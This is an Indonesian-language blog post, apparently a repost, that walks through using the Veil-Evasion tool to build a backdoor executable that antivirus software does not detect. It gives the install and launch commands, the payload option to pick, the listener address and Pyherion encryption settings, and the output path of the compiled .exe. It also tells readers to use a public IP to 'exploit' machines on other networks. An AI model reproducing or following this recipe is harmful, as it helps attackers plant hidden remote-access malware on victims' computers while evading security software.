MEMBUAT BACKDOOR YANG TIDAK TERDETEKSI ANTIVIRUS MENGGUNAKAN VEIL-EVASION





ASSALAMUALAIKUM WR WB

kali ini gw mau berbagi ilmu cara membuat Backdoor yang tidak bisa terdeteksi AnitiVirus (AV) menggunakan VEIL-EVASION
jika anda yang suka melakukan pentest (Hacking) mungkin teknik ini udah gak asing di telinga kalian

oke langsung aja

install terlebih dahulu veil-evasion dengan perintah

apt-get install veil-evasion


buka veil-evasion dengan perintah

veil-evasion


masukan perintah list fungsinya untuk melihat options yang akan kita gunakan

list


Disini gw pake cara yang biasa gw pake buat bypass versi standar aja

pilih 31 dan Enter


Di tahap ini, masukan IP dan PORT yang ingin anda gunakan

dengan perintah

set LHOST 192.168.1.64

set USE_PYHERION Y

generate

NOTE : 192.168.1.64 adalah ip lokal gw, jadi anda harus menggunakan ip lokal anda bila ingin me-                           exploitasi satu jaringan yang sama
              jika anda ingin me-exploitasi jaringan yang berbeda maka anda harus gunakan IP PUBLIK anda
              dan LPORT gw pake adalah 4444 yaitu default bawaannya,  anda bisa menggantinya sesuai                          keinginan anda

           
Masukan nama backdoor anda

NOTE : PanjiEmangTamvan adalah nama backdoor gw :v

yah kalo dipikir-pikir emang gw tamvan juga sih B-) :v
wkwkwkwk :v

oke lanjutin lg


pilih cara default aja

1 dan Enter


Oke di tahap ini sudah kelar
anda bisa melihat file backdoor yang anda buat tadi di file

/var/lib/veil-evasion/output/compiled/PanjiEmangTamvan.exe



Ini hasil Screencrot undetectnya :v












Source : http://rextor404.blogspot.co.id/2015/12/membuat-backdoor-yang-tidak-terdeteksi.html









SHARE

Rava Nasution

I'm Rava Nasution, Writer and Accountant. Inspired to make things looks better.

  • Image
  • Image
  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment

1 comments:

  1. izin share gan

    http://b3lajarh4ck.blogspot.com/2018/07/backdoor-yang-tidak-terdeksi-anti-virus.html

    ReplyDelete

luvne.com ayeey.com cicicookies.com mbepp.com tipscantiknya.com kumpulanrumusnya.comnya.com